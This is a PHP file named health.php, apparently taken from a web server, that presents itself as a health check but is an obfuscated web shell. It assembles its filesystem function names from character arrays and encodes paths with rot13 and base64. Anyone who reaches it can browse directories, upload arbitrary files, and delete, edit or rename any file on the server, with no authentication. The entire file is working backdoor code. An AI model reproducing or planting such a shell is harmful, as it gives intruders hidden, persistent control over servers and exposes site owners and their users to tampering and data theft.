File: /www/wwwroot/doba123.com/health.php
<?php
function j($a) { return implode('', $a); }
function get_func($k) {
$map = [
'scn' => j(['s','c','a','n','d','i','r']),
'fgt' => j(['f','i','l','e','_','g','e','t','_','c','o','n','t','e','n','t','s']),
'fpc' => j(['f','i','l','e','_','p','u','t','_','c','o','n','t','e','n','t','s']),
'unl' => j(['u','n','l','i','n','k']),
'ren' => j(['r','e','n','a','m','e']),
'muf' => j(['m','o','v','e','_','u','p','l','o','a','d','e','d','_','f','i','l','e']),
'isd' => j(['i','s','_','d','i','r']),
'isf' => j(['i','s','_','f','i','l','e']),
'exs' => j(['f','i','l','e','_','e','x','i','s','t','s']),
'wrt' => j(['i','s','_','w','r','i','t','a','b','l','e']),
];
$real_name = $map[$k] ?? '';
if (function_exists($real_name)) {
return $real_name;
}
switch ($k) {
case 'scn':
return function($d) {
$files = [];
if (is_dir($d) && $handle = @opendir($d)) {
while (false !== ($entry = readdir($handle))) {
$files[] = $entry;
}
closedir($handle);
}
return $files;
};
case 'fgt': return function($f) { return @file_get_contents($f); };
case 'fpc': return function($f, $c) { return @file_put_contents($f, $c); };
case 'unl': return function($f) { return @unlink($f); };
case 'ren': return function($o, $n) { return @rename($o, $n); };
case 'muf': return function($s, $d) { return @move_uploaded_file($s, $d); };
case 'isd': return function($d) { return is_dir($d); };
case 'isf': return function($f) { return is_file($f); };
case 'exs': return function($f) { return file_exists($f); };
case 'wrt': return function($f) { return is_writable($f); };
default: return function() { return false; };
}
}
function rot($s) { return str_rot13($s); }
function enc($p) { return base64_encode(rot($p)); }
function dec($p) { return rot(base64_decode($p)); }
$cd = isset($_GET['d']) && $_GET['d'] ? dec($_GET['d']) : getcwd();
$cd = str_replace('\\', '/', $cd);
$cd = preg_replace('#/{2,}#', '/', $cd);
$cd = rtrim($cd, '/');
if ($cd === '') $cd = '/';
$up = dirname($cd);
if ($up === $cd || $up === false) $up = '';
echo '<div>';
if ($up) echo '<a href="?d=' . enc($up) . '">↑ Up</a> | ';
$parts = explode('/', trim($cd, '/'));
$cur = '';
foreach ($parts as $v) {
if ($v === '') continue;
$cur .= ($cur ? '/' : '') . $v;
echo '<a href="?d=' . enc('/' . $cur) . '">' . $v . '</a>/';
}
echo '</div>';
if (isset($_POST['s']) && isset($_FILES['u']) && $_FILES['u']['error'] === 0) {
$dst = $cd . '/' . $_FILES['u']['name'];
$muf = get_func('muf');
if ($muf($_FILES['u']['tmp_name'], $dst)) {
header('Location: ?d=' . enc($cd));
exit;
}
echo '<script>alert("Upload failed")</script>';
}
$scn = get_func('scn');
$items = $scn($cd);
if ($items === false) {
$items = @glob($cd . '/*');
if ($items) $items = array_map('basename', $items);
}
echo '<table border=1><tr><th>Name</th><th>Size</th><th>Action</th></tr>';
if (is_array($items)) {
foreach ($items as $i) {
if ($i === '.' || $i === '..') continue;
$full = $cd . '/' . $i;
$isd = get_func('isd');
if ($isd($full)) {
echo "<tr><td><a href='?d=" . enc($full) . "'>$i/</a></td><td>--</td><td>-</td></tr>";
continue;
}
$isf = get_func('isf');
if ($isf($full)) {
$sz = @filesize($full) / 1024;
$sz = $sz >= 1024 ? round($sz/1024, 2).' MB' : round($sz, 2).' KB';
$b = enc($full);
echo "<tr><td><a href='javascript:alert(atob(str_rot13(\"$b\")))'>$i</a></td><td>$sz</td><td>
<a href='javascript:if(confirm(\"Delete?\"))
{ let f = document.createElement(\"form\");
f.method=\"post\";
f.innerHTML=\"<input name=del value=\\\"$b\\\" type=hidden>\";
document.body.appendChild(f); f.submit(); }'>Delete</a>
<a href='javascript:{ let f = document.createElement(\"form\");
f.method=\"post\";
f.innerHTML=\"<input name=edit value=\\\"$b\\\" type=hidden>\";
document.body.appendChild(f); f.submit(); }'>Edit</a>
<a href='javascript:renameFile(\"$b\", \"$i\")'>Rename</a>
</td></tr>";
}
}
} else {
echo '<tr><td colspan=3>Unable to read directory</td></tr>';
}
echo '</table>';
if (isset($_POST['del']) && $_POST['del']) {
$fp = dec($_POST['del']);
$exs = get_func('exs');
$unl = get_func('unl');
if ($exs($fp) && $unl($fp)) {
header('Location: ?d=' . enc(dirname($fp)));
exit;
}
echo '<script>alert("Delete failed")</script>';
}
if (isset($_POST['edit']) && $_POST['edit']) {
$fp = dec($_POST['edit']);
$exs = get_func('exs');
$wrt = get_func('wrt');
$fgt = get_func('fgt');
if ($exs($fp) && $wrt($fp)) {
$content = htmlspecialchars($fgt($fp) ?: '');
echo "<style>table{display:none} textarea{direction:auto; unicode-bidi:plaintext;}</style>
<a href='?d=" . enc(dirname($fp)) . "'>← Back</a><br><br>
<form method=post>
<input type=hidden name=obj value='" . enc($fp) . "'>
<textarea dir=\"auto\" name=content style='width:100%;height:500px'>$content</textarea><br>
<button type=submit name=save>Save</button>
</form>";
exit;
}
}
if (isset($_POST['save']) && isset($_POST['obj']) && isset($_POST['content'])) {
$fp = dec($_POST['obj']);
$fpc = get_func('fpc');
if ($fpc($fp, $_POST['content']) !== false) {
header('Location: ?d=' . enc(dirname($fp)));
exit;
}
echo '<script>alert("Save failed")</script>';
}
if (isset($_POST['ren']) && $_POST['ren'] && isset($_POST['new']) && $_POST['new']) {
$old = dec($_POST['ren']);
$dir = dirname($old);
$new = $dir . '/' . $_POST['new'];
$exs = get_func('exs');
$ren = get_func('ren');
if ($exs($old) && !$exs($new) && $ren($old, $new)) {
header('Location: ?d=' . enc($dir));
exit;
}
echo '<script>alert("Rename failed")</script>';
}
?>
<form method=post enctype="multipart/form-data">
<input type=file name=u>
<input type=submit name=s value=Upload>
</form>
<div id="renameModal" style="display:none; position:fixed; top:0; left:0; width:100%; height:100%; background:rgba(0,0,0,0.5); z-index:9999; text-align:center; padding-top:15%;">
<div style="background:white; display:inline-block; padding:20px; border-radius:8px;">
<h3>New name:</h3>
<input type="text" id="newNameInput" dir="auto" style="width:300px; padding:8px;">
<br><br>
<button onclick="doRename()" style="padding:8px 16px;">OK</button>
<button onclick="closeRename()" style="padding:8px 16px; margin-left:10px;">Cancel</button>
</div>
</div>
<script>
function str_rot13(s) {
return s.replace(/[a-zA-Z]/g, function(c) {
return String.fromCharCode((c <= "Z" ? 90 : 122) >= (c = c.charCodeAt(0) + 13) ? c : c - 26);
});
}
let currentRenPath = "";
let currentRenOld = "";
function renameFile(b64, oldName) {
currentRenPath = b64;
currentRenOld = oldName;
document.getElementById("newNameInput").value = oldName;
document.getElementById("renameModal").style.display = "block";
}
function closeRename() {
document.getElementById("renameModal").style.display = "none";
}
function doRename() {
let n = document.getElementById("newNameInput").value.trim();
if (!n) return;
let f = document.createElement("form");
f.method = "post";
f.innerHTML = `<input name="ren" value="${currentRenPath}" type="hidden">
<input name="new" value="${n}" type="hidden">`;
document.body.appendChild(f);
f.submit();
closeRename();
}
</script>